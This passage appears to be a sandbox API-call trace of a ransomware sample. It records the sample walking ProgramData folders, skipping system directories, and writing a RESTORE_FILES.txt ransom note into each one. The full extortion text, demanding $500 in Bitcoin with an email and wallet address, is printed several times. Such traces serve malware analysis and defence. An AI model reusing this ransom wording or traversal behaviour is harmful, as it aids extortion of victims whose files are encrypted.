lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.046] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.046] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.046] CloseHandle (hObject=0xb4) returned 1 [0066.046] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.046] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.046] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\RESTORE_FILES.txt") returned 50 [0066.046] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\drm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.047] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.047] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.047] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.048] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.048] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.048] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.048] CloseHandle (hObject=0xa4) returned 1 [0066.048] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="Windows") returned -1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="Program Files") returned -1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="Program Files (x86)") returned -1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="$Recycle.bin") returned 1 [0066.048] lstrcmpiW (lpString1="eHome", lpString2="System Volume Information") returned -1 [0066.048] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned 34 [0066.048] lstrcmpW (lpString1="eHome", lpString2=".") returned 1 [0066.048] lstrcmpW (lpString1="eHome", lpString2="..") returned 1 [0066.048] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*") returned 36 [0066.048] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.048] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.048] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.048] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\.") returned 36 [0066.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.048] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\..") returned 37 [0066.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.049] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="logs", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned 39 [0066.049] lstrcmpW (lpString1="logs", lpString2=".") returned 1 [0066.049] lstrcmpW (lpString1="logs", lpString2="..") returned 1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*") returned 41 [0066.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\.") returned 41 [0066.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.049] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\..") returned 42 [0066.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.049] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0066.049] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0066.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt") returned 57 [0066.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\logs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0066.050] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0066.050] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.050] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0066.050] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0066.051] CloseHandle (hObject=0xb4) returned 1 [0066.051] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0066.051] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0066.051] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\RESTORE_FILES.txt") returned 52 [0066.051] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\ehome\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0066.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0066.192] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0066.199] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0066.199] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0066.440] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0066.440] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0066.440] CloseHandle (hObject=0xa4) returned 1 [0066.440] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="Windows") returned -1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files") returned -1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="Program Files (x86)") returned -1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="$Recycle.bin") returned 1 [0066.440] lstrcmpiW (lpString1="Event Viewer", lpString2="System Volume Information") returned -1 [0066.440] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer") returned 41 [0066.440] lstrcmpW (lpString1="Event Viewer", lpString2=".") returned 1 [0066.440] lstrcmpW (lpString1="Event Viewer", lpString2="..") returned 1 [0066.440] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*") returned 43 [0066.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0066.441] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.441] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.441] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.441] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.441] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\.") returned 43 [0066.441] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.441] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.441] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.441] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.441] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.442] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.442] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.442] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\..") returned 44 [0066.442] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.442] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.442] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="Windows") returned -1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="Program Files") returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="Program Files (x86)") returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="$Recycle.bin") returned 1 [0066.442] lstrcmpiW (lpString1="Views", lpString2="System Volume Information") returned 1 [0066.442] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views") returned 47 [0066.442] lstrcmpW (lpString1="Views", lpString2=".") returned 1 [0066.442] lstrcmpW (lpString1="Views", lpString2="..") returned 1 [0066.442] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*") returned 49 [0066.442] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0066.442] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.442] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.442] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.442] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\.") returned 49 [0066.442] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.443] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.443] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.443] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.443] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.443] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.443] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\..") returned 50 [0066.443] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.443] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.443] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Windows") returned -1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files") returned -1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="Program Files (x86)") returned -1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="$Recycle.bin") returned 1 [0066.443] lstrcmpiW (lpString1="ApplicationViewsRootNode", lpString2="System Volume Information") returned -1 [0066.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode") returned 72 [0066.443] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2=".") returned 1 [0066.443] lstrcmpW (lpString1="ApplicationViewsRootNode", lpString2="..") returned 1 [0066.443] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*") returned 74 [0066.443] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0066.443] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.443] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.443] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.443] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.443] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.443] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\.") returned 74 [0066.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.444] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0066.444] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.444] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.444] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.444] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\..") returned 75 [0066.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.444] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.444] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0066.444] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0066.444] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt") returned 90 [0066.444] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Event Viewer\\Views\\ApplicationViewsRootNode\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\event viewer\\views\\applicationviewsrootnode\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0066.444] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your 